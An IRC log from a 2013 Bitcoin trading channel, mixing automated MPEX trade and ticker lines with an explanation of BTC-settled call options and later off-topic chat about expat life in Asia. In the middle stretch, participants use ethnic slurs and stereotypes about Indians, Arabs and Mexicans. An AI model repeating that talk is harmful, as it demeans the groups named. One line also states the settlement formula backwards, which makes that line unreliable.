[S.MPOE] 2800 @ 0.00063367 = 1.7743 BTC [+] Feb 21 02:52:14 [MPEX] [S.MPOE] 4321 @ 0.00063656 = 2.7506 BTC [+] Feb 21 02:52:19 [MPEX] [S.MPOE] 13850 @ 0.0006367 = 8.8183 BTC [+] Feb 21 02:52:25 [MPEX] [S.MPOE] 976 @ 0.00063686 = 0.6216 BTC [+] Feb 21 02:59:48 [MPEX] [S.MPOE] 1850 @ 0.00063665 = 1.1778 BTC [-] Feb 21 03:05:45 [MPEX] [S.MPOE] 991 @ 0.0006285 = 0.6228 BTC [-] Feb 21 03:05:46 [MPEX] [S.MPOE] 4321 @ 0.00062718 = 2.71 BTC [-] Feb 21 03:05:48 [MPEX] [S.MPOE] 1000 @ 0.00062687 = 0.6269 BTC [-] Feb 21 03:05:49 [MPEX] [S.MPOE] 8655 @ 0.00062686 = 5.4255 BTC [-] Feb 21 03:09:28 PS4 Stream over Feb 21 03:09:34 no kojima, no price announcement Feb 21 03:09:34 fail Feb 21 03:09:48 looking to buy XRP Feb 21 03:10:09 nanotube has set the market Feb 21 03:10:12 1:1 Feb 21 03:10:16 lol Feb 21 03:10:17 demurrage my ass Feb 21 03:10:50 hehe Feb 21 03:11:21 freicoin is where it's at Feb 21 03:11:31 currently i am the miner Feb 21 03:12:00 ripple is last week Feb 21 03:12:37 [MPEX] [S.MPOE] 2471 @ 0.00063665 = 1.5732 BTC [+] Feb 21 03:12:38 [MPEX] [S.MPOE] 9330 @ 0.00063686 = 5.9419 BTC [+] Feb 21 03:12:41 [MPEX] [S.MPOE] 5368 @ 0.00063938 = 3.4322 BTC [+] Feb 21 03:12:43 [MPEX] [S.MPOE] 12399 @ 0.00063957 = 7.93 BTC [+] Feb 21 03:19:27 [MPEX] [S.MPOE] 4321 @ 0.00063935 = 2.7626 BTC [-] Feb 21 03:19:29 [MPEX] [S.MPOE] 9951 @ 0.00063957 = 6.3644 BTC [+] Feb 21 03:19:31 [MPEX] [S.MPOE] 10359 @ 0.0006406 = 6.636 BTC [+] Feb 21 03:20:54 ;;ticker Feb 21 03:20:54 BTCUSD ticker | Best bid: 29.71704, Best ask: 29.78000, Bid-ask spread: 0.06296, Last trade: 29.71704, 24 hour volume: 35931.59973145, 24 hour low: 28.98839, 24 hour high: 29.87035, 24 hour vwap: 29.48437 Feb 21 03:25:59 30 more cents. come on buy it Feb 21 03:34:26 .01 bot is working hard to push down the price. weird Feb 21 03:34:32 manipulators must be buying Feb 21 03:34:36 for next pump and dump Feb 21 03:34:53 who the hell buys .01 btc anyway? Feb 21 03:35:07 bots, i think. Feb 21 03:35:09 anybody else? Feb 21 03:41:00 interesting Feb 21 03:42:54 No, its actually pump and dont dump Feb 21 03:45:05 [MPEX] [S.MPOE] 4321 @ 0.000627 = 2.7093 BTC [-] Feb 21 03:45:07 [MPEX] [S.MPOE] 7603 @ 0.00062686 = 4.766 BTC [-] Feb 21 03:45:09 [MPEX] [S.MPOE] 3645 @ 0.00062556 = 2.2802 BTC [-] Feb 21 03:45:31 deadweasel: not everyone uses FOK Feb 21 03:45:42 some people incremental fill the order Feb 21 03:45:43 FOK? Feb 21 03:45:46 fill or kill Feb 21 03:46:01 either fill the order in it's entirety or kill it after a certain time Feb 21 03:46:21 ;;ticker Feb 21 03:46:21 BTCUSD ticker | Best bid: 29.62201, Best ask: 29.72209, Bid-ask spread: 0.10008, Last trade: 29.72209, 24 hour volume: 35966.27130235, 24 hour low: 28.98839, 24 hour high: 29.87035, 24 hour vwap: 29.48641 Feb 21 03:47:17 !ticker m X.IDIFF.MAR Feb 21 03:47:19 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (8 shares, 0.61 BTC), 30D: 0.0429 / 0.06540414 / 0.089 (338 shares, 22.11 BTC) Feb 21 03:47:35 ;;bc,stats Feb 21 03:47:37 Current Blocks: 222274 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1501 blocks | Next Difficulty In About: 1 week, 1 day, 0 hours, 38 minutes, and 30 seconds | Next Difficulty Estimate: 4297470.16991 | Estimated Percent Change: 17.70629 Feb 21 03:54:45 [MPEX] [S.MPOE] 4321 @ 0.0006256 = 2.7032 BTC [+] Feb 21 03:54:50 [MPEX] [S.MPOE] 15579 @ 0.00062556 = 9.7456 BTC [-] Feb 21 04:07:44 ;;ticker Feb 21 04:07:46 BTCUSD ticker | Best bid: 29.60002, Best ask: 29.67849, Bid-ask spread: 0.07847, Last trade: 29.67849, 24 hour volume: 34177.53570017, 24 hour low: 28.98839, 24 hour high: 29.87035, 24 hour vwap: 29.48634 Feb 21 04:08:02 hey guys... Feb 21 04:08:13 i was a little unclear on how the cash settlement works on options Feb 21 04:08:50 mircea_popescu if you have a minute can you go through this example with me? Feb 21 04:09:15 sure Feb 21 04:09:22 ok Feb 21 04:09:28 i bought this months $17 call Feb 21 04:09:41 it cost me 0.33832578 Feb 21 04:09:59 okay Feb 21 04:10:11 depending on how you value the premium i paid (i use my average cost of bitcoins) that puts my breakeven point around $25 Feb 21 04:10:24 alright. Feb 21 04:10:29 since the vwap is currently around $29 Feb 21 04:10:37 I am right about $4 in the money Feb 21 04:10:41 cool. Feb 21 04:10:55 ok, so when it settles though, I will be settled in bitcoins Feb 21 04:10:59 yea. Feb 21 04:11:11 so do i get $4/$29 Feb 21 04:11:15 no. Feb 21 04:11:18 worth of bitcoins? Feb 21 04:11:35 this is the part i got confused on Feb 21 04:11:43 you get (29 - 17) / 29 = 0.413793103 btc Feb 21 04:12:06 aha ok thanks so much Feb 21 04:12:14 [MPEX] [S.MPOE] 4321 @ 0.00062834 = 2.7151 BTC [+] Feb 21 04:12:16 [MPEX] [S.MPOE] 17999 @ 0.0006285 = 11.3124 BTC [+] Feb 21 04:12:17 [MPEX] [S.MPOE] 12241 @ 0.0006406 = 7.8416 BTC [+] Feb 21 04:12:17 that's like 30%ish in btc, or whatever in usd Feb 21 04:12:18 so you use the vwap Feb 21 04:12:19 [MPEX] [S.MPOE] 10379 @ 0.00064077 = 6.6506 BTC [+] Feb 21 04:12:23 yes. Feb 21 04:12:33 ( strike minus vwap) / vwap. Feb 21 04:12:45 so in that example, i will get approximately .41 btc... Feb 21 04:12:48 yes. Feb 21 04:12:52 i paid approx .33 btc Feb 21 04:13:01 right. Feb 21 04:13:24 so my real return upon exercising my option would be (value-cost)/cost right? Feb 21 04:13:49 well, in btc you paid .33 you got back 41, so .08 net profit. Feb 21 04:14:02 so "return" would be .08/.33 Feb 21 04:14:09 or roughly 25% Feb 21 04:14:10 in usd whatever, .41 *29 - .33 * 17 or what's the case Feb 21 04:14:30 ah ok i see Feb 21 04:14:37 that is cool Feb 21 04:15:07 basically you turned 6 bux into 12 Feb 21 04:15:17 at the end of the day, i would get the (vwap-strike)/vwap bitcoins Feb 21 04:15:21 NICE Feb 21 04:15:31 and the worth of those bitcoins is up to my valuation Feb 21 04:15:32 more than that lets see Feb 21 04:15:52 (11.89 - 5.61)/5.61 Feb 21 04:15:52 my avg cost of bitcoins for february was $25 now Feb 21 04:15:58 ;;calc (11.89 - 5.61)/5.61 Feb 21 04:15:59 1.11942959002 Feb 21 04:16:07 whereas the exchange only went Feb 21 04:16:15 111%???? Feb 21 04:16:19 ;;calc 12/17 Feb 21 04:16:20 0.705882352941 Feb 21 04:16:25 yeah so about double speed or w/e Feb 21 04:16:32 that is awesome Feb 21 04:16:45 it is funny Feb 21 04:16:45 it's what options do. if you have the right trend they accelerate it Feb 21 04:16:50 if you don't you lose whatever Feb 21 04:17:01 i only got the 17 call only cuz it had the lowest break even Feb 21 04:17:17 the 19 was not priced in line with the 17 Feb 21 04:17:27 so i paid more premium but got much lower breakeven point Feb 21 04:17:38 ya well, you know, it's not linear Feb 21 04:17:44 yeah Feb 21 04:17:55 i mean, for an option chain on a very thick stock Feb 21 04:18:01 like bank of america or something Feb 21 04:18:05 heinz Feb 21 04:18:13 every strike plus premium will usually equal the same Feb 21 04:18:24 mircea you're alive :) Feb 21 04:18:27 only because they expect linear price evolutions Feb 21 04:18:31 BitHub was there any question ?! Feb 21 04:18:31 yes Feb 21 04:18:48 mjr_ well i don't think the mpoe bot expected linear btc in the past year. Feb 21 04:18:51 its cool that you can find good value though Feb 21 04:22:38 [MPEX] [S.MPOE] 4321 @ 0.0006329 = 2.7348 BTC [-] Feb 21 04:22:40 [MPEX] [S.MPOE] 8522 @ 0.00063295 = 5.394 BTC [+] Feb 21 04:26:13 lol yes mircea i heard you got kidnapped Feb 21 04:34:58 [BTCTC] [S.DICE-PT] 10 @ 0.00597 = 0.0597 BTC [-] Feb 21 04:35:45 [BTCTC] [GSDPT] 165 @ 0.00595 = 0.9818 BTC [-] Feb 21 04:41:22 i c. Feb 21 04:41:29 Why is S.DICE so low anyway? eh Feb 21 04:42:04 ppl are selling it to buy asics Feb 21 04:42:13 I guess Feb 21 04:43:44 can you buy asicminer on a exchange yet or still hush hush? Feb 21 04:45:33 yeah, i am trying to scoop up as much as i can now while it's low Feb 21 04:46:06 what?! where Feb 21 04:47:41 [MPEX] [S.MPOE] 5250 @ 0.00063295 = 3.323 BTC [+] Feb 21 04:52:14 http://vincesamios.com/bitcoins/valuations-of-stocks-in-bitcoin-brain-melt Feb 21 04:58:32 [MPEX] [S.MPOE] 6800 @ 0.00063043 = 4.2869 BTC [-] Feb 21 04:59:54 "The valuation of said company, can in theory exceed the total number of bitcoins. brain melt" Feb 21 05:00:02 the things people pick to get hang up on seriously. Feb 21 05:02:28 jcpham a, actually he makes sense in the end. Feb 21 05:04:44 bitcoin talk is down Feb 21 05:04:44 ? Feb 21 05:05:34 practically twice a day. Feb 21 05:08:35 [BTCTC] [RSM] 62 @ 0.0081 = 0.5022 BTC [-] Feb 21 05:08:37 [BTCTC] [RSM] 1 @ 0.00784 BTC [-] Feb 21 05:08:38 [BTCTC] [RSM] 2 @ 0.003 = 0.006 BTC [-] Feb 21 05:09:41 why does 29.70 feels like its low Feb 21 05:09:43 for bitcoin Feb 21 05:09:45 >_> Feb 21 05:10:23 " The Bitcoin Forum is moving to a new server. Hold tight." Feb 21 05:11:00 [MPEX] [S.MPOE] 4321 @ 0.00062583 = 2.7042 BTC [-] Feb 21 05:11:03 [MPEX] [S.MPOE] 8329 @ 0.00062556 = 5.2103 BTC [-] Feb 21 05:11:14 these beans are shit. Feb 21 05:12:06 is a knife incoming? Feb 21 05:18:13 no wai, btctalk moving off shared hosting ?! Feb 21 05:18:21 i call shenanigans. Feb 21 05:19:07 !ticker m O.BTCUSD.C220T Feb 21 05:19:09 [MPEX:O.BTCUSD.C220T] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.20577298 / 0.20577298 / 0.20577298 (3 shares, 0.62 BTC), 30D: 0.18744462 / 0.1966088 / 0.20577298 (6 shares, 1.18 BTC) Feb 21 05:19:59 mircea_popescu: is the bot not quoting anymore? Feb 21 05:20:11 since friday is < 48 hours Feb 21 05:20:32 24 is the cutoff not 48 Feb 21 05:20:48 there's minute-ish gaps if the orders it has in expire before it can put new ones in Feb 21 05:21:14 anyways, im off. cya all tomorrow. Feb 21 05:21:47 [MPEX] [S.MPOE] 4321 @ 0.00062824 = 2.7146 BTC [+] Feb 21 05:21:47 [MPEX] [S.MPOE] 7529 @ 0.00062846 = 4.7317 BTC [+] **** BEGIN LOGGING AT Thu Feb 21 13:29:03 2013 Feb 21 13:29:05 well, it used to be 1 cad = 1.25 usd Feb 21 13:29:12 like when i was in high school Feb 21 13:29:23 ;;ticker Feb 21 13:29:26 BTCUSD ticker | Best bid: 29.61019, Best ask: 29.62000, Bid-ask spread: 0.00981, Last trade: 29.62000, 24 hour volume: 34715.21158870, 24 hour low: 28.98839, 24 hour high: 29.87035, 24 hour vwap: 29.55842 Feb 21 13:29:39 79 c on the 1 Feb 21 13:29:42 before? Feb 21 13:29:44 Bowjob actually there's a lot of old media references. elaine (seinfeld) gets evicted for putting canadian quarters in the washing machines Feb 21 13:30:04 yeah Feb 21 13:30:20 used to be canadian dollars were this "inferior fake dollar" practically. Feb 21 13:30:28 the fact that the usd is lower hurts a lot, im sure. Feb 21 13:30:35 was it 2 years ago? it was a bit before that Feb 21 13:30:39 the fact that it's absolutely never mentioned proves it. Feb 21 13:30:57 yeah i am Feb 21 13:31:10 :) Feb 21 13:31:20 Canadian Dollar used to be valued a lot more than us in the 50s I think Feb 21 13:31:25 up to the 60s Feb 21 13:31:51 BitHub well done. Feb 21 13:31:54 Bicknellski o, was it ? Feb 21 13:33:17 On July 11, 1864, the Canadian dollar was worth $2.78 US. Feb 21 13:33:23 well not the 50s Feb 21 13:33:30 it was the `860s lol Feb 21 13:33:34 a a Feb 21 13:33:36 1860s Feb 21 13:33:37 yukon effect Feb 21 13:33:54 before Canada was Canada Feb 21 13:34:01 um no wait Feb 21 13:34:07 1860 is too early for gold rush Feb 21 13:34:13 was it because they were pegged tot he sterling ? Feb 21 13:34:31 50-year high of $1.0614 US set on August 21, 1957 Feb 21 13:34:39 ya... so I remembered right Feb 21 13:34:51 1.06 is hardly "a lot more" :D Feb 21 13:34:54 it was the 50s... my parents used to brag about it Feb 21 13:34:56 lol Feb 21 13:35:03 ya that is why I thought it was more Feb 21 13:35:10 most of my life it was sub 1s Feb 21 13:35:13 Well, CAD was worth over 1 USD earlier this feb Feb 21 13:35:25 so greenback got some of it sbalue Feb 21 13:35:30 *value Feb 21 13:35:41 We enjoy the lower dollar Feb 21 13:35:57 lots of Mericans love to come fishing with a cheap dollar Feb 21 13:36:00 lol Feb 21 13:36:02 the us goods are actually cheaper than canadian ones.. Feb 21 13:36:08 ya odd Feb 21 13:36:12 not meds Feb 21 13:36:13 lol Feb 21 13:36:21 I go to bellingham for cheap deals sometimes Feb 21 13:36:21 ya, cheap dollar would help industry, if there were much left. Feb 21 13:36:23 not dead yet Feb 21 13:36:38 Actually.. americans complained that Canadians borderhop just to shop Feb 21 13:36:39 we didnt have a lot of "industry" Feb 21 13:36:41 and steal all the deals Feb 21 13:36:48 we sold off our resources mostly Feb 21 13:36:50 still do Feb 21 13:36:52 my family is involved in maufactoring in the usa, but there is not much left lol Feb 21 13:36:55 irrc Americans complained about canadians taking milk from the US Feb 21 13:37:02 with video proof Feb 21 13:37:10 weve been a service based economy for 20 or 30 years other than resources Feb 21 13:37:22 [MPEX] [S.MPOE] 20375 @ 0.00063647 = 12.9681 BTC [-] Feb 21 13:37:37 Sold off in pieces... Mr. Noi Feb 21 13:37:49 1860 too early for goldrush? why are the 49ers called the 49ers?? Feb 21 13:37:57 I love how detroit was basically boxed up and shipped to Mexico Feb 21 13:37:59 lol Feb 21 13:38:02 Chaang-Noi the yukon gold rush not the california one Feb 21 13:38:10 diffent rush Feb 21 13:38:17 there was the california one Feb 21 13:38:22 Yukon was later Feb 21 13:38:27 if I am not mistaken Feb 21 13:38:40 ahh Feb 21 13:38:55 that is what i get for reading a wall of text in 30 seconds Feb 21 13:38:59 Other minor ones as well Feb 21 13:39:00 http://www.huffingtonpost.com/2012/08/13/bellingham-costco-canadians-cheap-milk_n_1773495.html#slide=1374749 Feb 21 13:39:21 hah. I want you guys to note that those people who hounded the milk.. are Indo canadians Feb 21 13:39:30 they seem to hog all the milk. even here Feb 21 13:39:30 Indo? Feb 21 13:39:34 like indians Feb 21 13:39:34 Indonesia? Feb 21 13:39:36 no Feb 21 13:39:39 or our brothers. Feb 21 13:39:39 indian indians Feb 21 13:39:41 i love milk. Feb 21 13:39:42 the red dot indians Feb 21 13:39:48 the IDLE NO MORE! Feb 21 13:39:49 not the feather indians Feb 21 13:39:51 red dot Feb 21 13:40:00 oh our brothers from India Feb 21 13:40:00 think of dhalsim Feb 21 13:40:00 lol Feb 21 13:40:13 they buy carfuls of milk all the time Feb 21 13:40:14 Nice good on them Feb 21 13:40:21 smart Feb 21 13:40:27 just like we did with gas Feb 21 13:40:30 and clothes Feb 21 13:40:31 etc Feb 21 13:40:38 in Montreal or Niagra Feb 21 13:40:42 ... smokes mostly Feb 21 13:40:43 lol Feb 21 13:40:47 they seem to like milk a lot so Feb 21 13:40:48 lol Feb 21 13:40:51 ya it aint for adults Feb 21 13:40:56 GHEE! Feb 21 13:41:03 cooking with it all the time Feb 21 13:41:06 hey brown food is pretty good Feb 21 13:41:10 i like butter chicken Feb 21 13:41:14 hard to get coconut milk Feb 21 13:41:22 so they have to sub in real cow. Feb 21 13:41:41 I drink coconut milk... mostly. Feb 21 13:41:45 cheap here Feb 21 13:41:47 dont indians get queasy if they see cow meat Feb 21 13:41:51 http://polimedia.us/dtng/c/src/136104976652.jpg Feb 21 13:41:55 Hindus Feb 21 13:41:57 why does that look like it won't end well. Feb 21 13:42:01 it is a no no Feb 21 13:42:06 taboo... Feb 21 13:42:23 many Indians are vegans... Feb 21 13:42:32 vegetarians Feb 21 13:42:38 good eats... Feb 21 13:42:38 Bicknellski i have it in confidence that it only happens because they can't afford it. Feb 21 13:42:44 Love Indian food Feb 21 13:42:50 from this chick that came to college here. used to be vegan at home. Feb 21 13:43:02 you can sure peg 1 billion people? Feb 21 13:43:06 totally. Feb 21 13:43:08 sorry 800 million Feb 21 13:43:09 ? Feb 21 13:43:14 well.. lets see Feb 21 13:43:21 ya I am sure some actually follow their restrictions Feb 21 13:43:39 lumping in 800 million pretty tall order Feb 21 13:43:40 indians here are mostly taxi drivers, and gang bangers Feb 21 13:43:47 nice mix Feb 21 13:43:53 same thing with arabs. they don't drink alcohol ? when i visited egypt i could buy any imported alcohol at the duty free shop. Feb 21 13:44:06 what anyone in egypt whanted from white people is to buy them alcohol Feb 21 13:44:10 yes i kid you not. look up surrey Feb 21 13:44:21 it was like being in a junior high the side of a country. Feb 21 13:44:22 Like Americans love democracy then crush democracy at every turn Feb 21 13:44:29 lots of hypocrisy in the world Feb 21 13:44:30 lol Feb 21 13:44:44 called being human... Feb 21 13:45:14 One "race" doesnt corner the market on hypocrisy Feb 21 13:45:29 the us people are a race nao ?! Feb 21 13:45:30 Lived abroad in Asia for 17 years now... Feb 21 13:45:36 pretty much the same people here Feb 21 13:45:39 some lie Feb 21 13:45:41 some steal Feb 21 13:45:44 many work hard Feb 21 13:46:03 The ones that run US policy are Feb 21 13:46:12 ... typically WASPish Feb 21 13:46:44 Doesnt matter where you live most populations have their hypocrites Feb 21 13:46:53 ... show me a place that doesnt Feb 21 13:46:54 ugh... did you see a recent pic of the us president ? Feb 21 13:46:57 ...Ill move there Feb 21 13:47:02 http://en.wikipedia.org/wiki/2009_Vancouver_gang_war Feb 21 13:47:16 Over a quarter of gangs are indians Feb 21 13:47:27 Used to be Native and Bikers Feb 21 13:47:32 that was fun Feb 21 13:47:35 and the Chinese Feb 21 13:47:47 .... floating heads in the ocean in the 90s Feb 21 13:47:54 if I remember Feb 21 13:47:57 where in asia? Feb 21 13:47:58 LOL Feb 21 13:48:14 Canada is neither WARM or FUZZY Feb 21 13:48:19 we have great PR Feb 21 13:48:27 Indonesia right now Mr. Noi Feb 21 13:48:31 cool Feb 21 13:48:35 thailand here Feb 21 13:48:35 ... been to Thailand LOVED IT Feb 21 13:48:42 wait, you two both live in aha. Feb 21 13:48:43 yeah. Feb 21 13:48:52 Ya... lol Feb 21 13:49:04 not poverty or the fact that unions are gone etc Feb 21 13:49:11 it is the mexicans Feb 21 13:49:15 not Free Trade Feb 21 13:49:28 or Brian Mulroney and Dipshit Harper Feb 21 13:49:29 lol Feb 21 13:49:32 cripes Feb 21 13:49:45 People in mexico work 2x as hard for 100x less Feb 21 13:50:00 Try to get a Canadian to work on tree farm Feb 21 13:50:14 id do it for the right pay Feb 21 13:50:17 >:) Feb 21 13:50:19 They have to hire in people from Jamaica... Canadians wont last a week Feb 21 13:50:27 lol Feb 21 13:50:30 ya you would. Feb 21 13:50:53 but guess what... all the jobs in Canada and US are going to be not the right pay... Feb 21 13:50:56 give it time Feb 21 13:51:01 lets scale it up. i get $16 an hour for my cushy job Feb 21 13:51:04 you wont even be able to hide in a teaching job Feb 21 13:51:08 and get a pension Feb 21 13:51:31 You guys in the tech field... have it made Feb 21 13:51:40 if you have the skills Feb 21 13:51:43 they want you Feb 21 13:52:16 NICE Feb 21 13:52:21 great job if you can get it Feb 21 13:52:26 hahaha Feb 21 13:52:35 You not in the states Noi? Feb 21 13:52:44 You hanging out in Bangkok? Feb 21 13:53:02 Man I thought Jakarta was bad... but Bangkok... Feb 21 13:53:04 bought my girl a new laptop, has touch and windows 8, really fucking weird Feb 21 13:53:09 Not sure which is worse Feb 21 13:53:15 its like a iPad Feb 21 13:53:18 an Feb 21 13:53:19 ya sucks eh. Feb 21 13:53:32 Bicknellski what's wrong with jakarta ? Feb 21 13:53:40 GOOD GOD Feb 21 13:53:44 well, it seems like a nice toy for her, and she likes it, i dont think i could ever use it for doing other than fucking around though Feb 21 13:53:47 what is right Feb 21 13:53:51 3 words Feb 21 13:53:55 lol that dun help me much Feb 21 13:53:56 FLOODS Feb 21 13:53:56 HOT Feb 21 13:53:58 JAMMED Feb 21 13:54:04 o boy. ok. Feb 21 13:54:07 fucking around with an ipad like device Feb 21 13:54:08 kinky Feb 21 13:54:08 i dont live and almost never go to bkk, lol Feb 21 13:54:12 the infrastructure is 1900s Feb 21 13:54:21 ya nice... Feb 21 13:54:30 ChangMai... is nice Feb 21 13:54:32 Bicknellski 1900s, you mean sorta like ny ? Feb 21 13:54:36 or head south Feb 21 13:54:40 No lot worse Feb 21 13:54:51 that would be an advance in infrastructure for romania Feb 21 13:54:54 lol, when i go to bkk i almost always fly in or out, and while their take the sky train (subway in the sky) Feb 21 13:54:55 sounds ok Feb 21 13:54:58 lyspooner how would you know ? :D Feb 21 13:55:04 imagine all the old 50s and 60s electrical infrastructure sold to Indonesia Feb 21 13:55:14 and now they are struggling to replace it Feb 21 13:55:16 no need to imagine lol, it's what happened Feb 21 13:55:18 1900's what part of bkk where you in, lol Feb 21 13:55:25 the old dutch system of levees and dykes Feb 21 13:55:35 one huge cesspit here when it rains Feb 21 13:55:53 and then throw in about 20 million people? Feb 21 13:56:03 and the only thing that works right Feb 21 13:56:06 the Bus system Feb 21 13:56:23 that they jerry rigged into the center of the city for a few million Feb 21 13:56:39 which took 2 lanes of traffic off the main roads Feb 21 13:56:44 they work Feb 21 13:56:45 what city are you talking about bicknellski? Feb 21 13:56:50 but the JAMS it causes lol Feb 21 13:56:52 Jakarta Feb 21 13:56:58 okay, Feb 21 13:57:00 ... Bangkok I heard is a lot better Feb 21 13:57:02 now Feb 21 13:57:05 with they train Feb 21 13:57:12 they took 20? yers Feb 21 13:57:19 years for that one Feb 21 13:57:25 i ahve been here 8 years and they have always had the train when i was here Feb 21 13:57:42 Ya gotta have the AC Feb 21 13:57:56 i have never had AC in anyplace i have lived Feb 21 13:58:01 Im alright though out in the Burbs of Jakarta Feb 21 13:58:09 i dont have it now either, did not even need it for my gpu farm :/ Feb 21 13:58:11 ya you are the real deal Feb 21 13:58:20 ... I cant live in Canada anymore Feb 21 13:58:28 i do however never live in the city, so that helps a lot Feb 21 13:58:33 and I cant acclimatize to Jakarta Feb 21 13:58:52 i have windows open all the time, and lots of windows Feb 21 13:58:56 also fans off and on Feb 21 13:59:02 too cold in June in Ontario and Vancouver for me this summer Feb 21 13:59:10 the heat wave was a joke Feb 21 13:59:21 little humidity compared to here Feb 21 13:59:24 just move to bahamas Feb 21 13:59:26 find satoshi Feb 21 13:59:41 Do you mine BTC as well Mr. Noi? Feb 21 14:00:05 not right now, i did Feb 21 14:00:09 I was thinking about it... but the heat Feb 21 14:00:13 be a real problem Feb 21 14:00:17 hold some asicminer stock if that counts Feb 21 14:00:23 hahaha Feb 21 14:00:27 I saw Feb 21 14:00:31 i had like 25 ghash at one point Feb 21 14:00:45 ... making some return on your I for the shares you pawned in the forums Feb 21 14:00:46 nice Feb 21 14:01:18 LOVE Feb 21 14:01:27 I teach so I am satisfied Feb 21 14:01:40 and I can go golfing anytime I like if the rain aint to heavy Feb 21 14:01:46 ... beach? hmmm not too far Feb 21 14:01:54 Bali only 90 mins Feb 21 14:01:58 etc Feb 21 14:01:59 [MPEX] [S.MPOE] 4321 @ 0.00063606 = 2.7484 BTC [-] Feb 21 14:02:01 i like thailand, and im not that rich Feb 21 14:02:01 [MPEX] [S.MPOE] 239 @ 0.000636 = 0.152 BTC [-] Feb 21 14:02:05 always a trade off Feb 21 14:02:35 I wasnt born here... Mr. Noi probably would find US a pain in the ass compared to the convenience of Thailand Feb 21 14:02:52 here (Canada) Feb 21 14:02:56 there... I guess Feb 21 14:03:03 i do find the USA to be a pain in the ass Feb 21 14:03:08 No? Feb 21 14:03:20 can you get a good lemon grass soup? Feb 21 14:03:25 they take all meh freedomz Feb 21 14:03:38 i dont know if i could or not:) Feb 21 14:04:03 Guess there would be enough good Thai places to eat... Feb 21 14:04:06 but never the same Feb 21 14:04:27 Like I used to live in Korea and I do miss a good kalbi soup Feb 21 14:04:37 or kimchi done the right way Feb 21 14:04:41 my wife cooks most of the time Feb 21 14:05:10 Asia is a great place for expats... Feb 21 14:05:26 once you get your head around you aint in Kansas no more... Feb 21 14:05:39 You have to blend and go with the flow... Feb 21 14:05:54 and it is very easy to live in most countries here Feb 21 14:06:11 They didn't pay off the judges I guess Feb 21 14:06:34 usually they send people back to UK or AUS for the last year or two of a sentence. Feb 21 14:06:48 even in death cases Feb 21 14:06:56 ya obviously Feb 21 14:06:59 idiot Feb 21 14:07:07 You dont play in Asia Feb 21 14:07:18 dont care if you are a granny or not Feb 21 14:07:23 you know the risk Feb 21 14:07:24 [BTCTC] [BTC-TRADING-PT] 1 @ 0.0948 BTC [+] Feb 21 14:07:44 Cripes they target the touristas in Bali Feb 21 14:07:45 for that Feb 21 14:07:58 ... you don't buy drugs there either... Feb 21 14:08:20 not a good situation indonesian jail Feb 21 14:08:34 ... well the cops or locals can work together to set people up Feb 21 14:08:49 and to get off the charge you have to pay a bit amount Feb 21 14:09:11 eww Feb 21 14:09:20 crap that can happen in your house Feb 21 14:09:24 not just jail Feb 21 14:09:45 You have to get used to living with insects and geckos inside your home Feb 21 14:09:53 sometimes a big rat as well Feb 21 14:10:11 turn on the light at night in the kitchen... Feb 21 14:10:15 be PREPARED! Feb 21 14:10:19 lol Feb 21 14:10:27 I hated earwigs as kid Feb 21 14:10:41 imagine me with a 3 inch cockroach staring me down Feb 21 14:10:45 Ya!!!!! Feb 21 14:10:53 Scream like a girl Feb 21 14:10:57 and it FLIES Feb 21 14:11:00 Awwww Feb 21 14:11:02 lol Feb 21 14:11:07 ya... ask Noi. Feb 21 14:11:16 bet they have there too in Thailand Feb 21 14:11:27 ... I love the Giant spiders in the trees Feb 21 14:11:45 insects everywhere Feb 21 14:12:07 living in the land of perpetual summer is great Feb 21 14:13:20 hmmm Feb 21 14:13:25 ya... go high enough here Feb 21 14:13:27 it is like that Feb 21 14:13:30 alpine Feb 21 14:13:38 tropical highlands Feb 21 14:13:45 just about an hour from here Feb 21 14:14:03 Temp is 22 to 23 at night Feb 21 14:14:25 and... 26 to 28 C daytime Feb 21 14:14:33 it is nice Feb 21 14:14:41 have to wear a light jacket Feb 21 14:14:47 ... perfect Feb 21 14:14:51 year round... Feb 21 14:15:38 have one drop in your popcorn watching twilight zone Feb 21 14:15:45 and then scream Feb 21 14:15:48 like a girl Feb 21 14:16:16 ya... after I stop screaming Feb 21 14:16:19 lol Feb 21 14:17:09 First time you see a monkey in the trees that is when you know you have moved a distance away from your home Feb 21 14:18:37 We could be good... just have to throw away all our modern crap Feb 21 14:18:47 ... naw Feb 21 14:18:50 nevermind Feb 21 14:18:51 lol Feb 21 14:18:54 [MPEX] [S.MPOE] 15761 @ 0.000636 = 10.024 BTC [-] Feb 21 14:18:56 [MPEX] [S.MPOE] 17688 @ 0.00063592 = 11.2482 BTC [-] Feb 21 14:19:12 Not much left there either Feb 21 14:19:21 cut most of the forest down Feb 21 14:19:26 ... same here in Indonesia Feb 21 14:19:30 fast losing it Feb 21 14:19:39 better go travel it before it is gone Feb 21 14:20:13 Ya sad. Feb 21 14:20:49 Alaska is pretty much intacted Feb 21 14:20:53 amazingly Feb 21 14:21:08 summer Feb 21 14:21:10 lol Feb 21 14:21:23 blackflies and bears WOOT Feb 21 14:22:41 http://artofmanliness.com/trunk/441/alone-in-the-wilderness/ <--- if I had grown up in the bush... I would do this for my last 20 years Feb 21 14:23:13 I am a man men don't ask for directions Feb 21 14:23:17 lol Feb 21 14:24:13 I watch the full length video of that Feb 21 14:24:19 it is awesome Feb 21 14:25:08 he did for 30 Feb 21 14:25:12 holy crap Feb 21 14:25:20 51... to 80 Feb 21 14:25:27 man what a rock Feb 21 14:26:01 no power tools Feb 21 14:26:03 lol Feb 21 14:26:06 sheesh Feb 21 14:26:56 NOPE Feb 21 14:27:05 find the video and download it Feb 21 14:27:11 it is awesome Feb 21 14:27:17 you can go and visit the cabin Feb 21 14:27:42 it is maintain by the parks service I think Feb 21 14:29:15 it goes Feb 21 14:29:26 not like you can maintain it forever... Feb 21 14:29:33 [MPEX] [S.MPOE] 13804 @ 0.00063592 = 8.7782 BTC [-] Feb 21 14:29:34 [MPEX] [S.MPOE] 5000 @ 0.00063311 = 3.1656 BTC [-] Feb 21 14:29:39 [MPEX] [S.MPOE] 43967 @ 0.0006331 = 27.8355 BTC [-] Feb 21 14:29:41 [MPEX] [S.MPOE] 9829 @ 0.00063234 = 6.2153 BTC [-] Feb 21 14:30:57 two cabins Feb 21 14:31:10 one was already there his buddies I guess or another oldtimer Feb 21 14:34:43 I know eh... REALITY TV before REALITY TV Feb 21 14:37:47 true that Feb 21 14:37:54 ... were ill equipped Feb 21 14:38:05 but that is why we have 7 billion... Feb 21 14:38:55 